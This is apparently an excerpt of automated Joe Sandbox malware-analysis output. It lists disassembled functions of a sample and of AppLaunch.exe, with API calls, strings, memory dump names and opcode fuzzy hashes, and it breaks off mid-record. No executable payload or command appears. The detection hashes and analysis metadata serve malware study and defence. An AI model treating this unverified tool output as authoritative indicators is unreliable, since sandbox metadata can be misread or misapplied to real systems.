Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: {default arg#$}::
API String ID: 0-3706473490
Opcode ID: 75e6a42bf6f7f65a9989d0e031bb89eb98fcd971fb3fbfac3a1f489531751e05
Instruction ID: e7ebe1ed97cc12c2e3aa57e6feda326113fd218c7daa29a24123d7deebccb2dd
Opcode Fuzzy Hash: 75e6a42bf6f7f65a9989d0e031bb89eb98fcd971fb3fbfac3a1f489531751e05
Instruction Fuzzy Hash: A1B16D706097458BC721DF28C4843EBBBE1AF94314F14882ED9DA8B301D779A8D5DB97

Uniqueness

Uniqueness Score: -1.00%

Function 00428A97 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 152stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00428B01
strchr.MSVCRT ref: 00428B92

Strings

aAeEfFgGcCdiouxXnpsS, xrefs: 00428B8B, 00428BA6
+-' 0#, xrefs: 00428AF6

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strchr
String ID: +-' 0#$aAeEfFgGcCdiouxXnpsS
API String ID: 2830005266-3207406329
Opcode ID: 5de911f515f7677bfb9251cb985e723ba9da24af6ab70f779110885d402dbfed
Instruction ID: 618fc38b919c072680122600061d5af80f31180899cd62cc0d6a9e8c55c8faff
Opcode Fuzzy Hash: 5de911f515f7677bfb9251cb985e723ba9da24af6ab70f779110885d402dbfed
Instruction Fuzzy Hash: BD51D271E062698FDB20CF65D48039EBBB2BF55300F98819FC845AB345DB78AD45CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004253F0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00425445
MultiByteToWideChar.KERNEL32 ref: 00425487

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 9b9dead1ad5818bdf0d41cc0c2c5f59ca9815985fcd59b752d26f123936414ff
Instruction ID: c9dc50e0792fa78c6e5a5cf78c938a6f7b38ce7ee61ed8a5b0c1a3c151f6f453
Opcode Fuzzy Hash: 9b9dead1ad5818bdf0d41cc0c2c5f59ca9815985fcd59b752d26f123936414ff
Instruction Fuzzy Hash: 844137B06097608FD710EF29E44431BBBE0BF85315F948A5EF89487394D37AD9898B87

Uniqueness

Uniqueness Score: -1.00%

Function 004166D8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 101stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00416732

Strings

, xrefs: 00416786
: , xrefs: 004194B6
new , xrefs: 00416744

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strcmp
String ID: $ : $new
API String ID: 1004003707-2075650739
Opcode ID: ff2ad678ee312e15f6694a27594c7d1b7ade25dda1213b62c13134f2d0e66754
Instruction ID: 71b00ea12b3583841e9e9ab592243d9c1775ff61cc4d724509cb39dd2424776a
Opcode Fuzzy Hash: ff2ad678ee312e15f6694a27594c7d1b7ade25dda1213b62c13134f2d0e66754
Instruction Fuzzy Hash: 70415D74704305CBC700DF19C5846AAB7E1AF84328F08847EE9998B356DB78DC99CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004CA434 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004CA450
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004CA469

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 5f690417a4d93073dc2ddfa8e960542f9770d2d8b2a798eb6a614c7a7def726d
Instruction ID: 12cbd2d6d819e2c97e51dc8c0141535391f3cc7d9f8f6a9dc12f4eb5af73ceb8
Opcode Fuzzy Hash: 5f690417a4d93073dc2ddfa8e960542f9770d2d8b2a798eb6a614c7a7def726d
Instruction Fuzzy Hash: 7A01F53A608719AFE6AC2675BC49F6B2664EB4177E320023FFA10801F1EF9D5C22515E

Uniqueness

Uniqueness Score: -1.00%

Function 00426E00 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00426E22
_strdup.MSVCRT(?,?,?,?,?,?,?,?,00427599), ref: 00426E2D
localeconv.MSVCRT ref: 00426E4C
free.MSVCRT(?,?,?,?,?,?,?,?,00427599), ref: 00426EA5

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: localeconv$_strdupfree
String ID:
API String ID: 611303462-0
Opcode ID: 9e1881c8929fd6ff0445c3d7695892d567f5a22a5e3fe5680f1f7506e94fb45b
Instruction ID: d7e45d38c7c9da7fd00f0905ab7b71b5fd67017a79e10acaff64eaa235028ce3
Opcode Fuzzy Hash: 9e1881c8929fd6ff0445c3d7695892d567f5a22a5e3fe5680f1f7506e94fb45b
Instruction Fuzzy Hash: 011163B46087318EC720DF26E04466BB7E1AF48314F868E5EE4D98B361E338D485DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00426E1C Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00426E22
_strdup.MSVCRT(?,?,?,?,?,?,?,?,00427599), ref: 00426E2D
localeconv.MSVCRT ref: 00426E4C

Part of subcall function 00425580: setlocale.MSVCRT ref: 004255AA
Part of subcall function 00425580: strchr.MSVCRT ref: 004255BA
Part of subcall function 00425580: atoi.MSVCRT ref: 004255CD

free.MSVCRT(?,?,?,?,?,?,?,?,00427599), ref: 00426EA5

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: localeconv$_strdupatoifreesetlocalestrchr
String ID:
API String ID: 1444949750-0
Opcode ID: fad84a75f0de30ff4bf5543b3ccd9d0efc018bd09818f7684aca4dff736a9ed3
Instruction ID: cd1388480a453d11c5e957956e0ecb3ba3819ecc0b9fc2b5b89019844292caca
Opcode Fuzzy Hash: fad84a75f0de30ff4bf5543b3ccd9d0efc018bd09818f7684aca4dff736a9ed3
Instruction Fuzzy Hash: C4015274608B208ED710DF36E04425BB7E0AF48314F868D5EE8D587351E338E845CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00428F90 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 35stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00428FB3
wcslen.MSVCRT ref: 00429516

Strings

(null), xrefs: 004297AA
(null), xrefs: 004296C8

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strlenwcslen
String ID: (null)$(null)
API String ID: 803329031-1601437019
Opcode ID: 81bde0dcb85462ab5b53d4a18df8e3ee63a39ed567f729cf0cf30f09b1de77eb
Instruction ID: 83b4ad44822a16c4390c1c0d89a7a26399c1b04059be88466f748a79db1bfef2
Opcode Fuzzy Hash: 81bde0dcb85462ab5b53d4a18df8e3ee63a39ed567f729cf0cf30f09b1de77eb
Instruction Fuzzy Hash: 4CF01930704229CBDB00DE68E5D596F37A1EF54304FA5446EE5029B302DB38DC568B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041E670 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,0041EC96), ref: 0041E7DE

Strings

@, xrefs: 0041E782

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: 4a92dc209483a025addc4f35f708e6cc57bec7e41c43112be009efda565c61c2
Instruction ID: 5876e54ff5fe37f01a14dc1b18318355baa0d7588be70bfb387c1ad053179217
Opcode Fuzzy Hash: 4a92dc209483a025addc4f35f708e6cc57bec7e41c43112be009efda565c61c2
Instruction Fuzzy Hash: A251F3799042415FEB25CF2AD0843A7BBD0BF91318F58855EDD954B382D339EC86C785

Uniqueness

Uniqueness Score: -1.00%

Function 004DA947 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004DA9C1
_free.LIBCMT ref: 004DA9D0

Strings

-WM, xrefs: 004DA99C

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _free
String ID: -WM
API String ID: 269201875-843315743
Opcode ID: b2705ce832e38e93ed40e17ac2a57d613976f7f523c97b0c0e98f217b7dc43d7
Instruction ID: e4b6525dc46e030dab05ad81d3959f86e674f226558e90bb603611f2345fca64
Opcode Fuzzy Hash: b2705ce832e38e93ed40e17ac2a57d613976f7f523c97b0c0e98f217b7dc43d7
Instruction Fuzzy Hash: 491142B1C01218ABDF119F9ACC92ADEFFB8BF18354F54446FE804B2211E7385955CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 0041EC7A

Strings

TpO, xrefs: 0041EC53, 0041ECB1
TpO, xrefs: 0041ECBE

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: abort
String ID: TpO$TpO
API String ID: 4206212132-382618481
Opcode ID: bd1117b92875b7820f05c98b40a1cdcf17a2e67654c1492972bdb9bc6abeb8f5
Instruction ID: 382311f08a43b120b0a463cf54f71581e4282a3a70e500459ea2a30b2d90a9c5
Opcode Fuzzy Hash: bd1117b92875b7820f05c98b40a1cdcf17a2e67654c1492972bdb9bc6abeb8f5
Instruction Fuzzy Hash: 49112A78A0020DABCF18DF96C8819DEB7B5AF85304F10846AEC0967301EA34AE85CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 004C92AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004C92B6

Part of subcall function 004C91E9: std::exception::exception.LIBCONCRT ref: 004C91F6

Strings

h+C, xrefs: 004B8440
D$$t, xrefs: 004B844E

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: std::exception::exceptionstd::invalid_argument::invalid_argument
String ID: D$$t$h+C
API String ID: 688446690-2472099948
Opcode ID: 88fcb1c12ac631126c71379eb7a91123189db6f64200c3dded34078b076e9280
Instruction ID: 05ce0da7632b4af4c4d0153d646b33414782707cfbc79d3919e5993c22cab33f
Opcode Fuzzy Hash: 88fcb1c12ac631126c71379eb7a91123189db6f64200c3dded34078b076e9280
Instruction Fuzzy Hash: F4C0123880020C778A00FAE2D84EE8CBB285A04300F4040AEAA1092081AAB8AB0886C8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AppLaunch.exePID: 6060, Parent PID: 6828COMMON

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7%
Total number of Nodes:	2000
Total number of Limit Nodes:	45

Executed Functions

Function 00415391 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,00415390,?,?,?,?,?,00416442), ref: 004153B3
TerminateProcess.KERNEL32(00000000,?,00415390,?,?,?,?,?,00416442), ref: 004153BA
ExitProcess.KERNEL32 ref: 004153CC

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 474f2a571a10c6b5d588eb5a9c8dd6d434d2b884cef2c402f38dbe37c319379d
Instruction ID: 8d724f3f6bdbb6cd1aace0564e3a3edcd45079e7585e9a666f0bf620fd200295
Opcode Fuzzy Hash: 474f2a571a10c6b5d588eb5a9c8dd6d434d2b884cef2c402f38dbe37c319379d
Instruction Fuzzy Hash: 09E04F3110064CEBCB212B14DC1D9DE3B79EB41381B940426F81586131CB79DDA2CA88

Uniqueness

Uniqueness Score: -1.00%

Function 00413738 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00013744,0041323D), ref: 0041373D

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c53b040f3baeafeed60e3e242a263a20fc811e8b7f85cd414fb6c64221208805
Instruction ID: 3d7660946c4c6e2bdc9d981756c31ba6c20195c910a17caf48f3b8c8d5d9e59f
Opcode Fuzzy Hash: c53b040f3baeafeed60e3e242a263a20fc811e8b7f85cd414fb6c64221208805
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA1A Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 0041DCA2

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 20f946bc56a7be79df171dbbcb06097a272a7cfc765e518eb32cbc310ef1d0fc
Instruction ID: ffbfd817270d60441c671b66c245a9794294216d314ed78d7faa8a4a699b0c5a
Opcode Fuzzy Hash: 20f946bc56a7be79df171dbbcb06097a272a7cfc765e518eb32cbc310ef1d0fc
Instruction Fuzzy Hash: 98C114F0E042499FCF15DF99D880BEE7BB0AF49304F14406BE91597392D7789982CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00420DC7 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00420A80: CreateFileW.KERNELBASE(00000000,00000000,?,00420E70,?,?,00000000,?,00420E70,00000000,0000000C), ref: 00420A9D

GetLastError.KERNEL32 ref: 00420EDB
__dosmaperr.LIBCMT ref: 00420EE2
GetFileType.KERNELBASE(00000000), ref: 00420EEE
GetLastError.KERNEL32 ref: 00420EF8
__dosmaperr.LIBCMT ref: 00420F01
CloseHandle.KERNEL32(00000000), ref: 00420F21
CloseHandle.KERNEL32(0041966E), ref: 0042106E
GetLastError.KERNEL32 ref: 004210A0
__dosmaperr.LIBCMT ref: 004210A7

Strings

H, xrefs: 0042102C

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: c4315a732d6b7fe706bf0a0d1349a6886f3db0e4390b40a3245472f53330642a
Instruction ID: be23aed905b86ebc22c3ecb63a47e8efe377f7c6536bbcb0bf29fb7692a15e0d
Opcode Fuzzy Hash: c4315a732d6b7fe706bf0a0d1349a6886f3db0e4390b40a3245472f53330642a
Instruction Fuzzy Hash: DAA11731B041688FCF199F68E851BAE3BE1EF06324F55415EE811AB3A2C7398C52C759

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE92 Relevance: 4.7, APIs: 3, Instructions: 177
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041B627: GetConsoleCP.KERNEL32(?,004053F0,00000000), ref: 0041B66F

WriteFile.KERNELBASE(?,00000000,00432C68,00000000,00000000,00000000,004053F0,004053F0,004053F0,00000000,00000000,?,00415695,00000000,00432C68,00000010), ref: 0041BFE3
GetLastError.KERNEL32(?,00415695,00000000,00432C68,00000010,004053F0), ref: 0041BFED
__dosmaperr.LIBCMT ref: 0041C032

Memory Dump Source

Source File: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.263484775.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263517945.000000000042B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263531333.0000000000434000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.263536672.0000000000439000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_AppLaunch.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID:
API String ID: 251514795-0
